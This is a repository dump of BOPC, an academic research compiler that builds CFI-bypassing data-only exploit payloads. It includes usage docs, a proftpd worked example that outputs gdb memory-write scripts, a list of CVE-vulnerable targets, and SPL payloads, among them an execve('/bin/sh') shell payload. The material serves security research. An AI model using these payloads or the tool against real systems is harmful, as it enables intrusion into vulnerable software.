Repository: HexHive/BOPC Branch: master Commit: dc98173b4baf Files: 44 Total size: 590.8 KB Directory structure: gitextract_g5a28eqg/ ├── README.md ├── evaluation/ │ ├── README.md │ ├── ghttpd │ ├── httpd │ ├── lt-wireshark │ ├── nginx1 │ ├── nullhttpd │ ├── opensshd │ ├── orzhttpd │ ├── proftpd │ ├── smbclient │ ├── sudo │ └── wuftpd ├── payloads/ │ ├── README.md │ ├── abloop.spl │ ├── execve.spl │ ├── ifelse.spl │ ├── infloop.spl │ ├── loop.spl │ ├── memrd.spl │ ├── memwr.spl │ ├── print.spl │ ├── regmod.spl │ ├── regref4.spl │ ├── regref5.spl │ ├── regset4.spl │ └── regset5.spl ├── setup.sh └── source/ ├── BOPC.py ├── README.md ├── absblk.py ├── calls.py ├── capability.py ├── compile.py ├── config.py ├── coreutils.py ├── delta.py ├── map.py ├── mark.py ├── optimize.py ├── output.py ├── path.py ├── search.py └── simulate.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # Block Oriented Programming Compiler (BOPC) ___ ## What is BOPC **NEW:** The talk from CCS'18 presentation is available [here](https://www.youtube.com/watch?v=iK7jhrK5uyg). BOPC (stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary, Turing-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that execute the desired payload while adhering to the binary's Control Flow Graph (CFG). This implies that the existing control flow hijacking defenses are not sufficient to detect this style of execution, as execution does never violates the Control Flow Integrity (CFI). Essentially, we can say that Block Oriented Programming is _code reuse under CFI_. BOPC works with basic blocks (hence the name "block-oriented"). What it does is to find a set of _functional_ blocks (i.e., blocks that perform useful computations). This step is somewhat similar with finding Return Oriented Programming (ROP) gadgets. Having the functional blocks, BOPC looks for _dispatcher_ blocks to that are used to stitch functional blocks together. Compared to ROP (that we can move from one gadget to the next without any limitation), here we can't do that as it would violate the CFI. Instead, BOPC finds a proper sequence for dispatcher blocks that naturally lead the execution from one functional block to the next one. Unfortunately the problem of building _Data-Only_ payloads is NP-hard. However it turns out that in practice BOPC finds solution in a reasonable amount of time. For more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf), and our [slides](./ccs18_slides.pdf) from CCS'18. To operate, BOPC requires 3 inputs: * A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**) * The desired payload, expressed in a high level language called SPL (stands for _SPloit Language_) * The so-called "_entry point_", which is the first instruction in the binary that the payload execution should start. There can be more than one entry points and determining it is part of the vulnerability discovery process. The output of BOPC is a set of "what-where" memory writes that indicate how the memory should be initialized (i.e., what values to write at which memory addresses). When the execution reaches the entry point and the memory is initialized according to the output of BOPC, the target binary execute the desired payload instead of continuing the original execution. **Disclaimer:** This is a research project coded by a single guy. It's not a product, so do **not** expect it to work perfectly under all scenarios. It works nicely for the provided test cases, but beyond that we cannot guarantee that will work as expected. ___ ## Installation Just run `setup.sh` :) ___ ## How to use BOPC BOPC started as a hacky project, so several changes made to adapt it into an scientific context. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly different from the actual implementation, as we omitted several implementation details from the paper. The actual implementation overview is shown below: ![alt text](./source/images/BOPC_overview.png) ### Command line arguments explained A good place to start are the command line arguments: ``` usage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d] [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY] [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all] [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings] [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]] optional arguments: -h, --help show this help message and exit General Arguments: -b BINARY, --binary BINARY Binary file of the target application -a {save,load,saveonly}, --abstractions {save,load,saveonly} Work with abstraction file --emit-IR Dump SPL IR to a file and exit -d Set debugging level to minimum -dd Set debugging level to basic (recommended) -ddd Set debugging level to verbose (DEBUG ONLY) -dddd Set debugging level to print-everything (DEBUG ONLY) -V, --version show program's version number and exit Search Options: -s SOURCE, --source SOURCE Source file with SPL payload -e ENTRY, --entry ENTRY The entry point in the binary that payload starts -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full} Use the SPL optimizer (Default: none) -f {raw,idc,gdb}, --format {raw,idc,gdb} The format of the solution (Default: raw) --find-all Find all the solutions Application Capability: -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...] Measure application's capability. Options (can be many) all Search for all Statements regset Search for Register Assignments regmod Search for Register Modifications memrd Search for Memory Reads memwr Search for Memory Writes call Search for Function/System Calls cond Search for Conditional Jumps load Load capabilities from file save Save capabilities to file noedge Dump statements and exit (don't calculate edges) Debugging Options: --mapping-id ID Run the Trace Searching algorithm on a given mapping ID --mapping MAP [MAP ...] Run the Trace Searching algorithm on a given register mapping --enum-mappings Enumerate all possible mappings and exit --abstract-blk BLKADDR Abstract a specific basic block and exit ``` Ok, there are a lot of options here (divided into 4 categories) as BOPC can do several things. Let's start with the **General Arguments**. To avoid working directly with assembly, BOPC, "abstracts" each basic block into a set of "actions". For more details, please check [absblk.py](./source/absblk.py). Abstraction process symbolically executes each basic block in the binary and carefully monitors its actions. The abstraction process can take from a few minutes (for small binaries) to several hours (for the larger ones). Waiting that much every time that you want to run BOPC does not sound a good idea, so BOPC uses an old trick: _caching_. The abstraction process depends on the binary and not on the SPL payload nor the entry point, so we only need to calculate them *once* per binary. Therefore, we have to calculate the abstractions only one time, then save them into a file and each time loading them. The `save` and `saveonly` options save the abstractions into a file. The only difference is that `saveonly` halts execution after it saves the abstractions, while `save` continues to search for a solution. As you can guess, the `load` option loads the abstractions from a file. The `--emit-IR` option is used to "dump" the IR representation of the SPL payload (this is another intermediate result that you should not worry about it). BOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend you to use either the `-dd` or the `-ddd` to get a detailed progress status. Let's get into the **Search Options** options. The most important arguments here are the `--source` (which is a file that contains the SPL payload) and the `--entry` which is an address inside the binary that indicates the entry point. Trace searching starts from the entry point, so this is quite important. The optimizer (`-O` option) is double edge knife. On the one hand, it optimizes the SPL payload to make it more flexible. This means that it increases the likelihood to find a solution. On the other hand, the search space (along with the execution time) is increased. The decision is up to the user, hence the use of optimizer is optional. The 2 possible optimizations are the _out of order execution_ (`ooo` option) and the _statement rewriting_ (`rewrite` option). The out-of-order optimization reorders payload statements. Consider for example the following SPL payload: ``` __r0 = 13; __r1 = 37; ``` To find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`) then a functional block for the second statement (`__r1 = 37`) and a set of dispatcher blocks to connect these two statements. However these functional blocks may be far apart so a dispatcher may not exist. However there's no difference if you execute the `__r0 = 13` statement first or second as it does not have any dependencies with the other statement. Thus if we rewrite the payload as follows: ``` __r1 = 37; __r0 = 13; ``` It may be possible to find another set dispatcher blocks, hopefully much smaller (path `A -> B` may be much longer than path `B -> A`) and find a solution. Internally, this is a **two-step** process. First the optimizer **groups** independent statements together (for more details take a look [here](./source/optimize.py)) and generated and augmented SPL IR. Then, the trace search module, permutes statements within each group, each time resulting in a different SPL payload. However all these payloads are equivalent. As you can guess there are can be an exponential number of permutations, so this can take forever. To alleviate that, you can adjust `N_OUT_OF_ORDER_ATTEMPTS` configuration parameter and tell BOPC to stop after trying **N** iterations, instead of trying all of them. The statement rewriting is an under development optimization that rewrites some statements that do not exist in the binary. For instance if the SPL payload spawns a shell through 'execve()' but the target binary does not invoke `execve()` at all, then BOPC fails as there are no functional blocks for that statement. However, if the target binary invokes `execv()`, it may be possible to find a solution by replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements, and adjust payload accordingly. As we already explained, the output of BOPC is a set of "what-where" memory writes. There are several ways to express the output. For instance they can be raw lines containing the address, the value and the size of the data that should be written in memory. Or they can be a gdb/IDA script that can run directly on the debugger and modify the memory accordingly. The last option is the best one as it you only need to run the BOPC output into the debugger. Currently only the `gdb` format is implemented. The **Application Capability** options used to measure _Application's capabilities_, that gives us upper bounds on **what** payloads the target binary is capable of executing. Finally the **Debugging Options** assist the audit/debugging/development process. They are used to bypass parts of the BOP work-flow. Do not use them unless you're doing changes in the code. Recall that BOPC finds a mapping between virtual and host registers along with a mapping between SPL variables and underlying memory addresses. If that mapping does not lead to a solution it goes back and tries another one. If you want to focus on a specific mapping (e.g., let's say that code crashes at mapping 458), you don't have to wait for BOPC to try the first 457 mappings first. By supplying the `--mapping-id=458` option you can skip all mappings and focus on that one. In case that you don't know the mapping number but you know the actual mapping you can instead you the `--mapping` option: `--mapping=`__r0=rax __r1=rbx` Finally, BOPC has a lot of configuration options. You see all of them in [config.py](./source/config.py) and adjust them according to our needs. The default values are a nice trade off between accuracy and performance that I found during then evaluation. ## Example Let's see now how to actually use BOPC. The first thing to do is to get the basic block abstractions. This step is optional, but I expect that you are going to run BOPC several times, so it's a good idea to get the abstractions first: ``` ./source/BOPC.py -dd --binary $BINARY --abstractions saveonly ``` This calculates the abstractions and saves them into a file named `$BINARY.abs`. Don't forget to enable debugging to see the status on the screen. Writing an SPL payload is pretty much like writing C: ```C void payload() { string prog = "/bin/sh\0"; int argv = {&prog, 0x0}; __r0 = &prog; __r1 = &argv; __r2 = 0; execve(__r0, __r1, __r2); } ``` Please take a look at the available [payloads](./payloads) to see all features of SPL. Don't expect to write crazy program with SPL; Yes, in theory you can write any program. In practice the more complicated is the SPL payload, the more the complexity increases and the harder it gets to find a solution. Running BOPC is as simple as the following: ``` ./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \ --entry $ENTRY --format gdb ``` If everything goes well an `*.gdb` file will be created that contains the set of memory writes to execute the desired payload. ### Pruning search space A common problem is that there can be thousands of mappings (it's exponential based on the number of registers and variables that are used). Each mapping can take up to a minute to test (assuming out of order execution and other optimizations), so BOPC may run for days. However, if you know approximately where a solution could be, you can ask BOPC to quickly find (and verify) it, without trying all mappings. Let's assume that you want to execute the following SPL payload: ```C void payload() { string msg = "This is my random message! :)\0"; __r0 = 0; __r1 = &msg; __r2 = 32; write( __r0, __r1, __r2 ); } ``` Because we have a system call, we know the register mapping: `__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`. Let's assume that we're on `proftpd` binary which contains the following "all-in-one" functional block: ```Assembly .text:000000000041D0B5 loc_41D0B5: .text:000000000041D0B5 mov edi, cs:scoreboard_fd ; fd .text:000000000041D0BB mov edx, 20h ; n .text:000000000041D0C0 mov esi, offset header ; buf .text:000000000041D0C5 call _write ``` The abstractions for this basic block, will be the following (recall that to get the abstractions for a single basic block, you need to pass the `--abstract-blk 0x41D0B5` in the command line). ``` [22:02:07,822] [+] Abstractions for basic block 0x41d0b5: [22:02:07,823] [+] regwr : [22:02:07,823] [+] rsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'} [22:02:07,823] [+] rdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': , 'deps': []} [22:02:07,823] [+] rsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'} [22:02:07,823] [+] rdx = {'writable': False, 'const': 32L, 'type': 'concrete'} [22:02:07,823] [+] memrd : set([(>, 32)]) [22:02:07,823] [+] memwr : set([(>, >)]) [22:02:07,823] [+] conwr : set([(576460752303359992L, 64)]) [22:02:07,823] [+] splmemwr : [] [22:02:07,823] [+] call : {} [22:02:07,823] [+] cond : {} [22:02:07,823] [+] symvars : {} [22:02:07,823] [*] ``` Here, `__r0 <-> rdi` is loaded indirectly and the value of `__r1 <-> rsi` (which holds the `msg` variable) is `6787008` or `0x678fc0` in hex. Then we enumerate all possible mappings with the `--enum-mappings` option. Here, there are *287* possible mappinges, but there are instances that we have thousands of mappings: If we look at the output we can quickly search for the appropriate mapping, which in our case is mapping *#89*: ``` [.... TRUNCATED FOR BREVITY ....] [21:59:28,471] [*] Trying mapping #88: [21:59:28,471] [*] Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx [21:59:28,471] [*] Variables: msg <-> * [21:59:28,614] [*] Trying mapping #89: [21:59:28,614] [*] Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx [21:59:28,614] [*] Variables: msg <-> 0x678fc0L [21:59:28,762] [*] Trying mapping #90: [21:59:28,762] [*] Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx [21:59:28,762] [*] Variables: msg <-> * [.... TRUNCATED FOR BREVITY ....] [22:00:04,709] [*] Trying mapping #287: [22:00:04,709] [*] Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx [22:00:04,709] [*] Variables: msg <-> * [22:00:04,979] [+] Trace searching algorithm finished with exit code 0 ``` Now that we know the actual mapping, we can tell BOPC to focus on this one. All we have to do is to pass the `--mapping-id 89` option. We run this and after 1 minute and 51 seconds later, we get the solution: ``` # # This file has been created by BOPC at: 29/03/2018 22:04 # # Solution #1 # Mapping #89 # Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx # Variables: msg <-> 0x678fc0L # # Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')] # break *0x403740 break *0x41d0b5 # Entry point set $pc = 0x41d0b5 # Allocation size is always bigger (it may not needed at all) set $pool = malloc(20480) # In case that rbp is not initialized set $rbp = $rsp + 0x800 # Stack and frame pointers aliases set $stack = $rsp set $frame = $rbp set {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00} set {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} ``` Let's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed. This is a list of `($pc, $src, $dst)` tuples. `$pc` is the program counter of the SPL statement. `$src` is the address of the functional block for the current SPL statement and `$dst` is the address of the next functional block. Before it runs, script adjusts `$rip` to point to the entry point, and makes sure that stack pointers (`$rsp`, `$rbp`) are valid. It also allocates a "variable pool" (for more details please look at [simulate.py](./source/simulate.py)) which in our case is not used. Then we have the two actual memory writes at `0x678fc0` and at `0x66e9e0`. If you load the binary in gdb and run this script you will see your payload being executed: ``` (gdb) break main Breakpoint 5 at 0x4041a0 (gdb) run Starting program: /home/ispo/BOPC/evaluation/proftpd Breakpoint 1, 0x00000000004041a0 in main () (gdb) continue Continuing. Breakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard () (gdb) continue Continuing. Breakpoint 2, 0x0000000000403740 in write@plt () (gdb) continue Continuing. This is my random message! :) Program received signal SIGSEGV, Segmentation fault. 0x00007fffffffde60 in ?? () ``` Note that BOPC stops after executing the desired payload (hence the crash). If you want to avoid this situation you can use the `returnto` SPL statement to naturally transfer execution to a safe location. ### Measuring application capabilities **NOTE:** This is a new concept, which is not mentioned in the paper. Beyond finding Data-Only payloads, BOPC provides some basic capability measurements. Although it is not related to the Block Oriented Programming, it can provide upper bounds and strong "indications" on what types of payloads can be executed and what are not. This is very useful as we can quickly find types of payloads that **cannot** be executed in the target binary. To get the all application capabilities run the following code: ``` ./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save ``` If you want to simply dump all functional gadgets for a specific statement, you can do it as follows: ``` ./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge ``` Where `$STMT` can be one ore more from `{all, regset, regmod, memrd, memwr, call, cond}`. The `noedge` option is to boost things up (essentially it does not calculate edges in the capability graph; Each node in the capability graph represents a functional block from the binary while and edge represents the context-sensitive shortest path distance between two functional blocks). ___ ## Final Notes (please read them carefully!) * When the symbolic execution engine deals with filesystem (i.e., it has to `open` a file), we have to provide it a valid file. Filename is defined in `SYMBOLIC_FILENAME` in [coreutils.py](./source/coreutils.py). * If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add CLI flags to trigger it :P * In case that addresses used by concolic execution do not work, adjust them from [simulate.py](./source/simulate.py) * Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py) * For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet) ___ ================================================ FILE: evaluation/README.md ================================================ # Block Oriented Programming Compiler (BOPC) ___ ### Vulnerable Application Overview | Application | CVE | |----------------------------|---------------| |[ProFTPd](./proftpd) | CVE-2006-5815 | |[nginx](./nginx1) | CVE-2013-2028 | |[sudo](./sudo) | CVE-2012-0809 | |[orzhttpd](./orzhttpd) | BugtraqID 41956 | |[wuftdp](./wuftpd) | CVE-2000-0573 | |[nullhttpd](./nullhttpd) | CVE-2002-1496 | |[opensshd](./opensshd) | CVE-2001-0144 | |[wireshark](./lt-wireshark) | CVE-2014-2299 | |[apache](./httpd) | CVE-2006-3747 | |[smbclient](./smbclient) | CVE-2009-1886 | ___ ================================================ FILE: payloads/README.md ================================================ # Block Oriented Programming Compiler (BOPC) ___ ### SPL Payload Overview | Payload | Description | |--------------------------|---------------------------------------------| | [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values | | [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory | | [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values | | [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory | | [regmod](./regmod.spl) | Initialize a register with an arbitrary value and modify it | | [memrd](./memrd.spl) | Read from arbitrary memory | | [memwr](./memwr.spl) | Write to arbitrary memory | | [print](./print.spl) | Display a message to stdout using write | | [execve](./execve.spl) | Spawn a shell through execve | | [abloop](./abloop.spl) | Perform an arbitrarily long bounded loop utilizing regmod | | [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body | | [ifelse](./ifelse.spl) | An if-else condition based on a register comparison | | [loop](./loop.spl) | Conditional loop with register modification | ___ ================================================ FILE: payloads/abloop.spl ================================================ // // BOPC Evaluation // // Arbitrary bounded loop with register modification // void payload() { __r0 = 0; LOOP: __r0 += 1; goto LOOP; } ================================================ FILE: payloads/execve.spl ================================================ // // BOPC Evaluation // // execve('/bin/sh') payload // void payload() { string prog = "/bin/sh\0"; int argv = {&prog, 0x0}; __r0 = &prog; __r1 = &argv; __r2 = 0; execve(__r0, __r1, __r2); // return ? } ================================================ FILE: payloads/ifelse.spl ================================================ // // BOPC Evaluation // // Simple if-else condition // void payload() { __r0 = 0; if (__r0 != 0 ) goto SKIP; __r1 = 1; goto END; SKIP: __r1 = 0; END: // return 0x400ca7; __r0 = 0; } ================================================ FILE: payloads/infloop.spl ================================================ // // BOPC Evaluation // // Infinity loop with constant assignment // void payload() { // __r0 = 1; LOOP: __r1 = 0; goto LOOP; } ================================================ FILE: payloads/loop.spl ================================================ // // BOPC Evaluation // // Simple loop // void payload() { __r0 = 0; LOOP: __r0 += 1; if (__r0 != 3 ) goto LOOP; } ================================================ FILE: payloads/memrd.spl ================================================ // // BOPC Evaluation // // Memory Load // void payload() { int array = {1, 2, 3, 4, 5}; __r1 = &array; __r0 = *__r1; } ================================================ FILE: payloads/memwr.spl ================================================ // // BOPC Evaluation // // Memory Store // void payload() { int array = {1, 2, 3, 4, 5}; __r0 = &array; __r1 = 0; *__r0 = __r1; } ================================================ FILE: payloads/print.spl ================================================ // // BOPC Evaluation // // Print an arbitrary message to stdout using write() // void payload() { string msg = "This is my random message! :)\0"; __r0 = 0; __r1 = &msg; __r2 = 1; write( __r0, __r1, __r2 ); // return 0x?? ;s } ================================================ FILE: payloads/regmod.spl ================================================ // // BOPC Evaluation // // Register modification // void payload() { __r0 = 0; __r0 += 1; } ================================================ FILE: payloads/regref4.spl ================================================ // // BOPC Evaluation // // Initialize 4 registers with references // void payload() { int var_a = 0x100; string var_b = "this is a random string"; int var_c = {1, 2, 3, &var_a, 4, &var_b}; int var_d = &var_c; __r0 = &var_a; __r1 = &var_b; __r2 = &var_c; __r3 = &var_d; } ================================================ FILE: payloads/regref5.spl ================================================ // // BOPC Evaluation // // Initialize 5 registers with references // void payload() { long var_a = 0x100; string var_b = "this is a random string\x00"; long *var_c = {1, 2, 3, 4, &var_a, &var_b}; long var_d = &var_c; long *var_e = {&var_d, &var_d, &var_d}; __r0 = &var_a; __r1 = &var_b; __r2 = &var_c; __r3 = &var_d; __r4 = &var_e; // return ?? } ================================================ FILE: payloads/regset4.spl ================================================ // // BOPC Evaluation // // Initialize 4 registers // void payload() { __r0 = 0; __r1 = 1; __r2 = 2; __r3 = 3; } ================================================ FILE: payloads/regset5.spl ================================================ // // BOPC Evaluation // // Initialize 5 registers // void payload() { __r0 = 0; __r1 = 1; __r2 = 2; __r3 = 3; __r4 = 4; } ================================================ FILE: setup.sh ================================================ #!/bin/bash # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- msg() { GREEN='\033[01;32m' # bold green NC='\033[0m' # no color echo -e "${GREEN}[INFO]${NC} $1" } error() { RED='\033[01;31m' # bold red NC='\033[0m' # no color echo -e "${RED}[ERROR]${NC} $1" } # display fancy foo clear echo echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%' echo -e '\t% %' echo -e '\t% ::::::::: :::::::: ::::::::: :::::::: %' echo -e '\t% :+: :+: :+: :+: :+: :+: :+: :+: %' echo -e '\t% +:+ +:+ +:+ +:+ +:+ +:+ +:+ %' echo -e '\t% +#++:++#+ +#+ +:+ +#++:++#+ +#+ %' echo -e '\t% +#+ +#+ +#+ +#+ +#+ +#+ %' echo -e '\t% #+# #+# #+# #+# #+# #+# #+# %' echo -e '\t% ######### ######## ### ######## %' echo -e '\t% %' echo -e '\t% Block Oriented Programming Compiler %' echo -e '\t% %' echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%' echo msg "BOPC Installation Guide has been started ..." # base check (we need root) if [ "$EUID" -ne 0 ]; then error "Script needs root permissions to install the required packages." msg "Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)" echo exit fi # install prerequisites first apt-get install --yes python-pip apt-get install --yes graphviz libgraphviz-dev apt-get install --yes pkg-config python-tk # install pip packages pip install angr==7.8.9.26 pip install claripy==7.8.9.26 pip install matplotlib pip install simuvex # networkx must be installed after simuvex and angr, since they depend # on networkx 2.1 pip install networkx==1.11 pip install graphviz==0.8.1 pip install pygraphviz==1.3.1 msg "BOPC Installation completed ..." msg "Have a nice day :)" echo # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/BOPC.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # BOPC.py: # # # This is the main module of BOPC. It configures the environment and launches the other modules. # # ------------------------------------------------------------------------------------------------- from coreutils import * import absblk as A import compile as C import optimize as O import mark as M import search as S import capability as P import argparse import textwrap import ntpath import angr import os import sys # ------------------------------------------------------------------------------------------------ # Constant Definitions # ------------------------------------------------------------------------------------------------ VERSION = 'v2.1' # current version comments = '' # Additional comments to display on startup # ------------------------------------------------------------------------------------------------- # parse_args(): This function processes the command line arguments. # # :Ret: None. # def parse_args(): # create the parser object and the groups parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter) group_g = parser.add_argument_group('General Arguments') group_s = parser.add_argument_group('Search Options') group_c = parser.add_argument_group('Application Capability') group_d = parser.add_argument_group('Debugging Options') # ------------------------------------------------------------------------- # Group for general arguments # ------------------------------------------------------------------------- group_g.add_argument( '-b', "--binary", help = "Binary file of the target application", action = 'store', dest = 'binary', required = False, # True ) group_g.add_argument( '-a', "--abstractions", help = "Work with abstraction file", choices = ['save', 'load', 'saveonly'], default = 'none', action = 'store', dest = 'abstractions', required = False ) group_g.add_argument( "--emit-IR", help = "Dump SPL IR to a file and exit", action = 'store_const', const = True, dest = 'emit_IR', required = False ) # action='count' group_g.add_argument( '-d', help = "Set debugging level to minimum", action = 'store_const', const = DBG_LVL_1, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-dd', help = "Set debugging level to basic (recommended)", action = 'store_const', const = DBG_LVL_2, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-ddd', help = "Set debugging level to verbose (DEBUG ONLY)", action = 'store_const', const = DBG_LVL_3, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-dddd', help = "Set debugging level to print-everything (DEBUG ONLY)", action = 'store_const', const = DBG_LVL_4, dest = 'dbg_lvl', required = False ) group_g.add_argument( '-V', "--version", action = 'version', version = 'BOPC %s' % VERSION ) # ------------------------------------------------------------------------- # Group for searching arguments # ------------------------------------------------------------------------- group_s.add_argument( '-s', "--source", help = "Source file with SPL payload", action = 'store', dest = 'source', required = False ) group_s.add_argument( '-e', "--entry", help = "The entry point in the binary that payload starts", action = 'store', dest = 'entry', required = False ) group_s.add_argument( '-O', "--optimizer", help = "Use the SPL optimizer (Default: none)", choices = ['none', 'ooo', 'rewrite', 'full'], action = 'store', default = 'none', dest = 'optimizer', required = False ) group_s.add_argument( '-f', "--format", help = "The format of the solution (Default: raw)", choices = ['raw', 'idc', 'gdb'], action = 'store', default = 'raw', dest = 'format', required = False, ) group_s.add_argument( "--find-all", help = "Find all the solutions", action = 'store_const', default = 'one', const = 'all', dest = 'findall', required = False ) # ------------------------------------------------------------------------- # Group for debugging arguments # ------------------------------------------------------------------------- group_d.add_argument( "--mapping-id", help = "Run the Trace Searching algorithm on a given mapping ID", metavar = 'ID', action = 'store', default = -1, dest = 'mapping_id', required = False ) group_d.add_argument( "--mapping", help = "Run the Trace Searching algorithm on a given register mapping", metavar = 'MAP', nargs = '+', action = 'store', default = [], dest = 'mapping', required = False ) group_d.add_argument( "--enum-mappings", help = "Enumerate all possible mappings and exit", action = 'store_const', default = False, const = True, dest = 'enum_mappings', required = False ) group_d.add_argument( "--abstract-blk", help = "Abstract a specific basic block and exit", metavar = 'BLKADDR', action = 'store', dest = 'absblk', required = False ) # ------------------------------------------------------------------------- # Group for application capabilities # ------------------------------------------------------------------------- group_c.add_argument( '-c', "--capability", help = textwrap.dedent('''\ Measure application's capability. Options (can be many) all\tSearch for all Statements regset\tSearch for Register Assignments regmod\tSearch for Register Modifications memrd\tSearch for Memory Reads memwr\tSearch for Memory Writes call\tSearch for Function/System Calls cond\tSearch for Conditional Jumps load\tLoad capabilities from file save\tSave capabilities to file noedge\tDump statements and exit (don't calculate edges)'''), choices = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond', 'save', 'load', 'noedge'], metavar = 'OPTIONS', nargs = '+', # consume >=1 arguments (multiple options) action = 'store', dest = 'capabilities', required = False ) if len(sys.argv) == 1: parser.print_help(sys.stderr) sys.exit(1) return parser.parse_args() # do the parsing (+ error handling) # --------------------------------------------------------------------------------------------- # load(): Load the target binary and generate its CFG. # # :Arg filename: Binary's file name # :Ret: Function returns # def load( filename ): # load the binary (exception is thrown if name is invalid) project = angr.Project(filename, load_options={'auto_load_libs': False}) # generate CFG dbg_prnt(DBG_LVL_0, "Generating CFG. It might take a while...") CFG = project.analyses.CFGFast() dbg_prnt(DBG_LVL_0, "CFG generated.") # normalize CFG (i.e. make sure that there are no overlapping basic blocks) dbg_prnt(DBG_LVL_0, "Normalizing CFG...") CFG.normalize() # normalize every function object as well for _, func in project.kb.functions.iteritems(): if not func.normalized: dbg_prnt(DBG_LVL_4, "Normalizing function '%s' ..." % func.name) func.normalize() dbg_prnt(DBG_LVL_0, "Done.") emph("CFG has %s nodes and %s edges" % (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges())))) # create a quick mapping between addresses and nodes (basic blocks) for node in CFG.graph.nodes(): ADDR2NODE[ node.addr ] = node # create a quick mapping between basic block addresses and their corresponding functions for _, func in CFG.functions.iteritems(): # for each function for addr in func.block_addrs: # for each basic block in that function ADDR2FUNC[ addr ] = func return project, CFG # --------------------------------------------------------------------------------------------- # abstract(): Abstract the CFG and apply any further abstraction-related operations. # # :Arg mark: A valid graph marking object. # :Arg mode: Abstraction mode (load, save, saveonly, none) # :Arg 